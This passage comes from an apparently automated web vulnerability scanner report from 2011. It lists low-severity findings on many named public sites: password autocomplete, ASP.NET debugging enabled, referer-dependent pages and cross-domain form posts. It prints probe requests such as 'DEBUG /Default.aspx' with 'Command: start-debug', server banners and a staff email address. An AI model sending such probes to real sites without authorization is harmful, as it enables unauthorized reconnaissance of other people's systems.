Set-Cookie: jument_hash=2aaaf6d3dd05b89fe9a91fb542a542bf37833c97; expires=Fri, 01-Apr-2016 18:39:27 GMT; path=/; domain=.collegehumor.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmlns:fb="http://www.fa
...[SNIP]...
</strong>
               <form id="frm_login" method="post" action="/">
                   <input type="text" class="text" name="login_email" id="login_email" />
                   <input type="password" class="text" name="login_password" id="login_password" />
                   <a href="/user/reset">
...[SNIP]...

15.2. http://www.popularscreensavers.com/favicon.ico

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.popularscreensavers.com
Path:   /favicon.ico

Issue detail

The page contains a form with the following action URL:

The form contains the following password fields with autocomplete enabled:

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.popularscreensavers.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Sat, 02 Apr 2011 13:34:45 GMT
Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.8c DAV/2 mod_jk/1.2.28
Set-Cookie: JSESSIONID=9447E9A291E9E0B405C9506EB438405A; Path=/
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache
Cache-Control: no-store
Content-Language: en-US
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 100956


                                                                                                                           
...[SNIP]...
</div>
       <form name="changePassword" id="changePassword" action="/registration/ajaxEditPssAccount.jhtml" method="post">
           <input type="hidden" id="userName" name="account.userName" value="" />
...[SNIP]...
</label>
               <input class="inp-text" type="password" name="oldPassword" value="" />
           </div>
...[SNIP]...
</label>
               <input class="inp-text" type="password" name="newPassword" value="" />
           </div>
...[SNIP]...
</label>
               <input class="inp-text" type="password" name="confirmPassword" value="" />
           </div>
...[SNIP]...

15.3. http://www.popularscreensavers.com/favicon.ico

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.popularscreensavers.com
Path:   /favicon.ico

Issue detail

The page contains a form with the following action URL:

The form contains the following password field with autocomplete enabled:

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.popularscreensavers.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Sat, 02 Apr 2011 13:34:45 GMT
Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.8c DAV/2 mod_jk/1.2.28
Set-Cookie: JSESSIONID=9447E9A291E9E0B405C9506EB438405A; Path=/
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache
Cache-Control: no-store
Content-Language: en-US
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 100956


                                                                                                                           
...[SNIP]...
</div>
               <form id="loginForm" name="loginForm" method="post" action="/registration/loginAjax.jhtml">
                   <div class="login-email">
...[SNIP]...
<input type="text" name="" class="password-text form-input urchin" data-urchin="login_modal/password" id="modal-password-text" value="Password" />
                   <input type="password" name="loginPassword" class="password form-input" id="modal-password" value="" />
                   
                   </div>
...[SNIP]...

15.4. http://www.popularscreensavers.com/favicon.ico

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.popularscreensavers.com
Path:   /favicon.ico

Issue detail

The page contains a form with the following action URL:

The form contains the following password fields with autocomplete enabled:

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.popularscreensavers.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Sat, 02 Apr 2011 13:34:45 GMT
Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.8c DAV/2 mod_jk/1.2.28
Set-Cookie: JSESSIONID=9447E9A291E9E0B405C9506EB438405A; Path=/
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache
Cache-Control: no-store
Content-Language: en-US
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 100956


                                                                                                                           
...[SNIP]...
</div>
       <form name="changePassword" id="changePassword" action="/registration/ajaxEditPssAccount.jhtml" method="post">
           <input type="hidden" id="userName" name="account.userName" value="" />
...[SNIP]...
</label>
               <input class="inp-text" type="password" name="oldPassword" value="" />
           </div>
...[SNIP]...
</label>
               <input class="inp-text" type="password" name="newPassword" value="" />
           </div>
...[SNIP]...
</label>
               <input class="inp-text" type="password" name="confirmPassword" value="" />
           </div>
...[SNIP]...

16. ASP.NET debugging enabled
There are 15 instances of this issue:


16.1. http://www.blogtv.com/Default.aspx

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.blogtv.com
Path:   /Default.aspx

Issue detail

ASP.NET debugging is enabled on the server. The user context used to scan the application does not appear to be permitted to perform debugging, so this is not an immediately exploitable issue. However, if you were able to obtain or guess appropriate platform-level credentials, you may be able to perform debugging.

Request

DEBUG /Default.aspx HTTP/1.0
Host: www.blogtv.com
Command: start-debug

Response

HTTP/1.1 401 Unauthorized
Connection: close
Date: Sat, 02 Apr 2011 14:00:24 GMT
Server: Microsoft-IIS/6.0
WWW-Authenticate: Negotiate
WWW-Authenticate: NTLM
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 39

Debug access denied to '/Default.aspx'.

16.2. http://www.clearchannel.com/Default.aspx

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.clearchannel.com
Path:   /Default.aspx

Issue detail

ASP.NET debugging is enabled on the server. The user context used to scan the application does not appear to be permitted to perform debugging, so this is not an immediately exploitable issue. However, if you were able to obtain or guess appropriate platform-level credentials, you may be able to perform debugging.

Request

DEBUG /Default.aspx HTTP/1.0
Host: www.clearchannel.com
Command: start-debug

Response

HTTP/1.1 401 Unauthorized
Connection: close
Date: Sat, 02 Apr 2011 13:37:57 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 39

Debug access denied to '/Default.aspx'.

16.3. http://www.findlocation.com/Default.aspx

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.findlocation.com
Path:   /Default.aspx

Issue detail

ASP.NET debugging is enabled on the server. The user context used to scan the application does not appear to be permitted to perform debugging, so this is not an immediately exploitable issue. However, if you were able to obtain or guess appropriate platform-level credentials, you may be able to perform debugging.

Request

DEBUG /Default.aspx HTTP/1.0
Host: www.findlocation.com
Command: start-debug

Response

HTTP/1.1 401 Unauthorized
Connection: close
Date: Sat, 02 Apr 2011 13:54:30 GMT
Server: Microsoft-IIS/6.0
WWW-Authenticate: Negotiate
WWW-Authenticate: NTLM
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 39

Debug access denied to '/Default.aspx'.

16.4. http://www.investopedia.com/Default.aspx

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.investopedia.com
Path:   /Default.aspx

Issue detail

ASP.NET debugging is enabled on the server. The user context used to scan the application does not appear to be permitted to perform debugging, so this is not an immediately exploitable issue. However, if you were able to obtain or guess appropriate platform-level credentials, you may be able to perform debugging.

Request

DEBUG /Default.aspx HTTP/1.0
Host: www.investopedia.com
Command: start-debug

Response

HTTP/1.1 401 Unauthorized
Connection: close
Date: Sat, 02 Apr 2011 14:14:25 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 39

Debug access denied to '/Default.aspx'.

16.5. http://www.medicare.gov/Default.aspx

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.medicare.gov
Path:   /Default.aspx

Issue detail

ASP.NET debugging is enabled on the server. The user context used to scan the application does not appear to be permitted to perform debugging, so this is not an immediately exploitable issue. However, if you were able to obtain or guess appropriate platform-level credentials, you may be able to perform debugging.

Request

DEBUG /Default.aspx HTTP/1.0
Host: www.medicare.gov
Command: start-debug

Response

HTTP/1.1 401 Unauthorized
Connection: close
Date: Sat, 02 Apr 2011 14:04:16 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 39

Debug access denied to '/Default.aspx'.

16.6. http://www.netquote.com/Default.aspx

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.netquote.com
Path:   /Default.aspx

Issue detail

ASP.NET debugging is enabled on the server. The user context used to scan the application does not appear to be permitted to perform debugging, so this is not an immediately exploitable issue. However, if you were able to obtain or guess appropriate platform-level credentials, you may be able to perform debugging.

Request

DEBUG /Default.aspx HTTP/1.0
Host: www.netquote.com
Command: start-debug

Response

HTTP/1.1 401 Unauthorized
Connection: close
Date: Sat, 02 Apr 2011 13:36:38 GMT
Server: Microsoft-IIS/6.0
WWW-Authenticate: Negotiate
WWW-Authenticate: NTLM
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 39

Debug access denied to '/Default.aspx'.

16.7. http://www.newegg.com/Default.aspx

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.newegg.com
Path:   /Default.aspx

Issue detail

ASP.NET debugging is enabled on the server. The user context used to scan the application does not appear to be permitted to perform debugging, so this is not an immediately exploitable issue. However, if you were able to obtain or guess appropriate platform-level credentials, you may be able to perform debugging.

Request

DEBUG /Default.aspx HTTP/1.0
Host: www.newegg.com
Command: start-debug

Response

HTTP/1.1 401 Unauthorized
Server: Microsoft-IIS/6.0
WWW-Authenticate: Negotiate
WWW-Authenticate: NTLM
x-server-id: 102
X-UA-Compatible: IE=7
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 39
Date: Sat, 02 Apr 2011 13:40:39 GMT
Age: 0
Connection: keep-alive
X-Served-By: E401
X-Ver: 11030801
X-Cache: MISS
X-Cache-Hits: 0
Set-Cookie: NSC_xxx.ofxfhh.dpn-WJQ=ffffffffaf18326045525d5f4f58455e445a4a4229a1;expires=Sat, 02-Apr-2011 14:35:28 GMT;path=/

Debug access denied to '/Default.aspx'.

16.8. http://www.pch.com/Default.aspx

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.pch.com
Path:   /Default.aspx

Issue detail

ASP.NET debugging is enabled on the server. The user context used to scan the application does not appear to be permitted to perform debugging, so this is not an immediately exploitable issue. However, if you were able to obtain or guess appropriate platform-level credentials, you may be able to perform debugging.

Request

DEBUG /Default.aspx HTTP/1.0
Host: www.pch.com
Command: start-debug

Response

HTTP/1.1 401 Unauthorized
Connection: close
Date: Sat, 02 Apr 2011 13:27:31 GMT
Server: Microsoft-IIS/6.0
WWW-Authenticate: Negotiate
WWW-Authenticate: NTLM
WWW-Authenticate: Basic realm="www.pch.com"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 39

Debug access denied to '/Default.aspx'.

16.9. http://www.plentyoffish.com/Default.aspx

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.plentyoffish.com
Path:   /Default.aspx

Issue detail

ASP.NET debugging is enabled on the server. The user context used to scan the application does not appear to be permitted to perform debugging, so this is not an immediately exploitable issue. However, if you were able to obtain or guess appropriate platform-level credentials, you may be able to perform debugging.

Request

DEBUG /Default.aspx HTTP/1.0
Host: www.plentyoffish.com
Command: start-debug

Response

HTTP/1.1 401 Unauthorized
Connection: close
Date: Sat, 02 Apr 2011 13:27:01 GMT
Server: Microsoft-IIS/6.0
WWW-Authenticate: Negotiate
WWW-Authenticate: NTLM
X-Powered-By: ASP.NET
X-AspNet-Version: 4.0.30319
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 39

Debug access denied to '/Default.aspx'.

16.10. http://www.pricegong.com/Default.aspx

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.pricegong.com
Path:   /Default.aspx

Issue detail

ASP.NET debugging is enabled on the server. The user context used to scan the application does not appear to be permitted to perform debugging, so this is not an immediately exploitable issue. However, if you were able to obtain or guess appropriate platform-level credentials, you may be able to perform debugging.

Request

DEBUG /Default.aspx HTTP/1.0
Host: www.pricegong.com
Command: start-debug

Response

HTTP/1.1 401 Unauthorized
Connection: close
Date: Sat, 02 Apr 2011 14:05:08 GMT
Server: Microsoft-IIS/6.0
WWW-Authenticate: Negotiate
WWW-Authenticate: NTLM
X-Server-Name: WEB01
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 39

Debug access denied to '/Default.aspx'.

16.11. http://www.shopperreports.com/Default.aspx

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.shopperreports.com
Path:   /Default.aspx

Issue detail

ASP.NET debugging is enabled on the server. The user context used to scan the application does not appear to be permitted to perform debugging, so this is not an immediately exploitable issue. However, if you were able to obtain or guess appropriate platform-level credentials, you may be able to perform debugging.

Request

DEBUG /Default.aspx HTTP/1.0
Host: www.shopperreports.com
Command: start-debug

Response

HTTP/1.1 401 Unauthorized
Connection: close
Date: Sat, 02 Apr 2011 14:07:47 GMT
Server: Microsoft-IIS/6.0
WWW-Authenticate: Negotiate
WWW-Authenticate: NTLM
S: NHIS01
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 39

Debug access denied to '/Default.aspx'.

16.12. http://www.tidaltv.com/Default.aspx

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.tidaltv.com
Path:   /Default.aspx

Issue detail

ASP.NET debugging is enabled on the server. The user context used to scan the application does not appear to be permitted to perform debugging, so this is not an immediately exploitable issue. However, if you were able to obtain or guess appropriate platform-level credentials, you may be able to perform debugging.

Request

DEBUG /Default.aspx HTTP/1.0
Host: www.tidaltv.com
Command: start-debug

Response

HTTP/1.1 401 Unauthorized
Connection: close
Date: Sat, 02 Apr 2011 13:33:50 GMT
Server: Microsoft-IIS/6.0
WWW-Authenticate: Negotiate
WWW-Authenticate: NTLM
p3p: CP="NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 39

Debug access denied to '/Default.aspx'.

16.13. http://www.weatherbug.com/Default.aspx

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.weatherbug.com
Path:   /Default.aspx

Issue detail

ASP.NET debugging is enabled on the server. The user context used to scan the application does not appear to be permitted to perform debugging, so this is not an immediately exploitable issue. However, if you were able to obtain or guess appropriate platform-level credentials, you may be able to perform debugging.

Request

DEBUG /Default.aspx HTTP/1.0
Host: www.weatherbug.com
Command: start-debug

Response

HTTP/1.1 401 Unauthorized
Server: Microsoft-IIS/5.0
Date: Sat, 02 Apr 2011 12:44:08 GMT
P3P: CP="NOI DSP COR NID TAI STP UNI"
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 39

Debug access denied to '/Default.aspx'.

16.14. http://www.wellness.com/Default.aspx

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.wellness.com
Path:   /Default.aspx

Issue detail

ASP.NET debugging is enabled on the server. The user context used to scan the application does not appear to be permitted to perform debugging, so this is not an immediately exploitable issue. However, if you were able to obtain or guess appropriate platform-level credentials, you may be able to perform debugging.

Request

DEBUG /Default.aspx HTTP/1.0
Host: www.wellness.com
Command: start-debug

Response

HTTP/1.0 401 Unauthorized
Date: Sat, 02 Apr 2011 13:33:51 GMT
Server: Microsoft-IIS/6.0
WWW-Authenticate: Negotiate
WWW-Authenticate: NTLM
ETag: ""
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 39
X-Cache: MISS from squid3.earnware.corp
X-Cache-Lookup: MISS from squid3.earnware.corp:80
Via: 1.0 wellness.com, 1.0 squid3.earnware.corp (squid)
Connection: close

Debug access denied to '/Default.aspx'.

16.15. http://www.winbuyer.com/Default.aspx

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.winbuyer.com
Path:   /Default.aspx

Issue detail

ASP.NET debugging is enabled on the server. The user context used to scan the application does not appear to be permitted to perform debugging, so this is not an immediately exploitable issue. However, if you were able to obtain or guess appropriate platform-level credentials, you may be able to perform debugging.

Request

DEBUG /Default.aspx HTTP/1.0
Host: www.winbuyer.com
Command: start-debug

Response

HTTP/1.1 401 Unauthorized
Connection: close
Date: Sat, 02 Apr 2011 13:41:49 GMT
Server: Microsoft-IIS/6.0
WWW-Authenticate: Negotiate
WWW-Authenticate: NTLM
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 39

Debug access denied to '/Default.aspx'.

17. Referer-dependent response

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.kcom.com
Path:   /contact-us/

Request 1

GET /contact-us/ HTTP/1.1
Host: www.kcom.com
Proxy-Connection: keep-alive
Referer: http://www.kcom.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: exp_last_visit=986389016; __utmz=90957184.1301752662.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); exp_last_activity=1301749027; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D; __utma=90957184.848604376.1301752662.1301752662.1301752662.1; __utmc=90957184; __utmb=90957184.3.9.1301752673281

Response 1

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:57:10 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Set-Cookie: exp_last_activity=1301749030; expires=Sun, 01-Apr-2012 13:57:10 GMT; path=/
Set-Cookie: exp_tracker=a%3A2%3A%7Bi%3A0%3Bs%3A12%3A%22%2Fcontact-us%2F%22%3Bi%3A1%3Bs%3A5%3A%22index%22%3B%7D; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Sat, 02 Apr 2011 13:57:11 GMT
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 12291

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<META HTTP-EQUIV="Content-t
...[SNIP]...
<input type="hidden" id="00N300000055kEx" name="00N300000055kEx" title="Web-to-lead URL" value="KCOM Site - http://www.kcom.com/ - ">


<!-- NOTE: These fields are optional debugging elements. Please uncomment -->
<!-- these lines if you wish to test in debug mode. -->
<!-- <input type="hidden" name="debug" value=1> -->
<!-- <input type="hidden" name="debugEmail" value="zoe.keeping@kcom.com"> -->



<div class="left"><p><label for="first_name"><span class="orange">*</span>First Name:</label><br /><input id="first_name" maxlength="40" name="first_name" size="25" type="text" tabindex="2" /></p></div>

<div class="left"><p><label for="last_name"><span class="orange">*</span>Last Name:</label><br /><input id="last_name" maxlength="80" name="last_name" size="39" type="text" tabindex="3" /><br /></p></div>

<div class="both"><p><label for="email"><span class="orange">*</span>Email Address:</label><br /><input id="email" maxlength="80" name="email" size="55" type="text" tabindex="4"/><br /></p>

<p><label for="company">Company Name:</label><br /><input id="company" maxlength="40" name="company" size="55" type="text" tabindex="5" /><br /></p>

<p><span class="orange">*</span><label for="Postcode">PostCode:</label><br /><input id="zip" maxlength="30" name="zip" size="35" type="text" tabindex="6" /><br /></p>

<p><label for="phone">Phone Number:</label><br /><input id="phone" maxlength="40" name="phone" size="35" type="text" tabindex="7" /><br /></p></div>

<p>Preferred contact method:<br />
<label for="00N300000055SIy">Phone</label><input id="00N300000055SIy" name="00N300000055SIy" type="checkbox" value="1" />

<label for="00N300000055SIx">E-mail</label><input id="00N300000055SIx" name="00N300000055SIx" type="checkbox" value="1" /><br /></p>

<p><label for="description">Include a message:</label><br /><textarea name="00N300000057r28" id="00N300000057r28" rows="6" cols="74" tabindex="1"></textarea><br /></p>

<p><label for="00N300000055tV4">If you would not like to recieve information from us in the future
...[SNIP]...

Request 2

GET /contact-us/ HTTP/1.1
Host: www.kcom.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: exp_last_visit=986389016; __utmz=90957184.1301752662.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); exp_last_activity=1301749027; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D; __utma=90957184.848604376.1301752662.1301752662.1301752662.1; __utmc=90957184; __utmb=90957184.3.9.1301752673281

Response 2

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:57:31 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Set-Cookie: exp_last_activity=1301749051; expires=Sun, 01-Apr-2012 13:57:31 GMT; path=/
Set-Cookie: exp_tracker=a%3A2%3A%7Bi%3A0%3Bs%3A12%3A%22%2Fcontact-us%2F%22%3Bi%3A1%3Bs%3A5%3A%22index%22%3B%7D; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Sat, 02 Apr 2011 13:57:31 GMT
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 12271

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<META HTTP-EQUIV="Content-t
...[SNIP]...
<input type="hidden" id="00N300000055kEx" name="00N300000055kEx" title="Web-to-lead URL" value="KCOM Site - - ">


<!-- NOTE: These fields are optional debugging elements. Please uncomment -->
<!-- these lines if you wish to test in debug mode. -->
<!-- <input type="hidden" name="debug" value=1> -->
<!-- <input type="hidden" name="debugEmail" value="zoe.keeping@kcom.com"> -->



<div class="left"><p><label for="first_name"><span class="orange">*</span>First Name:</label><br /><input id="first_name" maxlength="40" name="first_name" size="25" type="text" tabindex="2" /></p></div>

<div class="left"><p><label for="last_name"><span class="orange">*</span>Last Name:</label><br /><input id="last_name" maxlength="80" name="last_name" size="39" type="text" tabindex="3" /><br /></p></div>

<div class="both"><p><label for="email"><span class="orange">*</span>Email Address:</label><br /><input id="email" maxlength="80" name="email" size="55" type="text" tabindex="4"/><br /></p>

<p><label for="company">Company Name:</label><br /><input id="company" maxlength="40" name="company" size="55" type="text" tabindex="5" /><br /></p>

<p><span class="orange">*</span><label for="Postcode">PostCode:</label><br /><input id="zip" maxlength="30" name="zip" size="35" type="text" tabindex="6" /><br /></p>

<p><label for="phone">Phone Number:</label><br /><input id="phone" maxlength="40" name="phone" size="35" type="text" tabindex="7" /><br /></p></div>

<p>Preferred contact method:<br />
<label for="00N300000055SIy">Phone</label><input id="00N300000055SIy" name="00N300000055SIy" type="checkbox" value="1" />

<label for="00N300000055SIx">E-mail</label><input id="00N300000055SIx" name="00N300000055SIx" type="checkbox" value="1" /><br /></p>

<p><label for="description">Include a message:</label><br /><textarea name="00N300000057r28" id="00N300000057r28" rows="6" cols="74" tabindex="1"></textarea><br /></p>

<p><label for="00N300000055tV4">If you would not like to recieve information from us in the future, please check this
...[SNIP]...

18. Cross-domain POST
There are 2 instances of this issue:


18.1. http://www.kcom.com/contact-us/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.kcom.com
Path:   /contact-us/

Issue detail

The page contains a form which POSTs data to the domain www.salesforce.com. The form contains the following fields:

Request

GET /contact-us/ HTTP/1.1
Host: www.kcom.com
Proxy-Connection: keep-alive
Referer: http://www.kcom.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: exp_last_visit=986389016; __utmz=90957184.1301752662.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); exp_last_activity=1301749027; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D; __utma=90957184.848604376.1301752662.1301752662.1301752662.1; __utmc=90957184; __utmb=90957184.3.9.1301752673281

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:57:10 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Set-Cookie: exp_last_activity=1301749030; expires=Sun, 01-Apr-2012 13:57:10 GMT; path=/
Set-Cookie: exp_tracker=a%3A2%3A%7Bi%3A0%3Bs%3A12%3A%22%2Fcontact-us%2F%22%3Bi%3A1%3Bs%3A5%3A%22index%22%3B%7D; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Sat, 02 Apr 2011 13:57:11 GMT
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 12291

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<META HTTP-EQUIV="Content-t
...[SNIP]...
</p>
                           
                                       
<form action="https://www.salesforce.com/servlet/servlet.WebToLead?encoding=UTF-8" method="post" onsubmit="return fullCheck(this);">

<input type="hidden" name="oid" value="00D30000000YSXR">
...[SNIP]...

18.2. http://www.realsimple.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.realsimple.com
Path:   /favicon.ico

Issue detail

The page contains a form which POSTs data to the domain ebm.cheetahmail.com. The form contains the following fields:

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.realsimple.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Sat, 02 Apr 2011 13:44:09 GMT
Server: Apache
ETag: "11faa34-1413-4875db8624980"
Accept-Ranges: bytes
Content-Type: text/html
Vary: X-Catmap-Header
P3P: CP='PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA PRE CUR ADMa DEVa TAIo PSAo PSDo IVAo IVDo CONo TELo OTPi OUR UNRo PUBi OTRo IND DSP CAO COR', CP='PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA PRE CUR ADMa DEVa TAIo PSAo PSDo IVAo IVDo CONo TELo OTPi OUR UNRo PUBi OTRo IND DSP CAO COR'
Content-Length: 36963

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head>
<title>Page Not Found - Re
...[SNIP]...
</span>
<form id="ftr_nl_form" method="post" action="http://ebm.cheetahmail.com/r/regf2"><input value="1085805114" type="hidden" name="aid">
...[SNIP]...

19. Cross-domain Referer leakage
There are 43 instances of this issue:


19.1. http://ad.doubleclick.net/adi/N1260.Google.com/B5219922.27

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N1260.Google.com/B5219922.27

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

